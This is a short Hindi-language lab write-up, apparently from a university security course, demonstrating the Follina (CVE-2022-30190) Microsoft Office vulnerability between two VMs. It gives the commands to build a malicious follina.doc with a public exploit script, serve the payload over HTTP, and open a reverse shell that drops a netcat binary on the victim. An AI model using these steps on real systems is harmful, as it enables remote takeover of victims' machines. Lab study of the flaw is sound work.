
Follina (CVE-2022-30190) एक Microsoft Office ज़ीरो-डे भेद्यता है जिसे हाल ही में खोजा गया है। यह एक उच्च-गंभीरता वाली भेद्यता है जिसका हैकर्स रिमोट कोड निष्पादन (RCE) हमलों के लिए उपयोग कर सकते हैं।
अमीन टिट्रोफिन | 17 दिसंबर 2022
Follina (CVE-2022-30190) हाल ही में खोजी गई एक Microsoft Office जीरो-डे भेद्यता है। यह एक उच्च-गंभीरता वाली भेद्यता है जिसका उपयोग हैकर्स रिमोट कोड निष्पादन (RCE) हमलों के लिए कर सकते हैं। यह तब मौजूद होती है जब किसी कॉलिंग एप्लिकेशन जैसे कि Word से URL प्रोटोकॉल का उपयोग करके MSDT को कॉल किया जाता है। इस भेद्यता का सफलतापूर्वक शोषण करने वाला हमलावर कॉलिंग एप्लिकेशन के विशेषाधिकारों के साथ मनमाना कोड चला सकता है। इसके बाद हमलावर प्रोग्राम इंस्टॉल कर सकता है, डेटा देख, बदल या हटा सकता है, या उपयोगकर्ता के अधिकारों द्वारा अनुमत संदर्भ में नए खाते बना सकता है।
2 VMs:
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
follina.py प्रोग्राम चलाने के बाद एक ( follina.doc ) दिखाई देगा, जिसमें एक दुर्भावनापूर्ण स्क्रिप्ट होती है।
दो VMs के बीच फ़ाइलें साझा करना आसान बनाने के लिए, हम Python http Server का उपयोग करेंगे
$ python3 –m http.server 8080
पोर्ट 9999 पर रिवर्स शेल प्राप्त करें। नोट, यह पीड़ित मशीन पर एक netcat बाइनरी डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। यदि एंटीवायरस अक्षम नहीं है तो यह एंटीवायरस डिटेक्शन को ट्रिगर करेगा।
$ python3 follina.py -r 9999
calc.exe पॉप करें:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
notepad.exe पॉप करें:
$ python3 follina.py -c "notepad"